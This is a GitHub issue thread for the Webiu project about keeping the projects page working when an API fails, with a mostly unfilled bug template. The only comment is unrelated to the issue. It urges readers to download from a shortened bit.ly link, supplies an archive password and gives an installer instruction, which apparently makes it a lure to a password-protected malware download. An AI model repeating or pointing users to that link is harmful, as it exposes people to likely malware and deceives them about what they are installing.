### ISSUE TITLE
Fix Projects Page for API errors

### ISSUE THREAD

**Issue by rajutkarsh07** [c2siorg/Webiu#66]
fixed projects data so that it can be seen evern if api doesn't work

**To Reproduce**

**Expected behavior**
A detailed description of the expected behaviour

**Screenshots**
If possible, please use screenshots

**Desktop (please complete the following information):**
 - OS: [e.g. iOS/Windows]
 - Browser [e.g. chrome]

**Smartphone (please complete the following information):**
 - Browser [e.g. mozilla, safari]

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
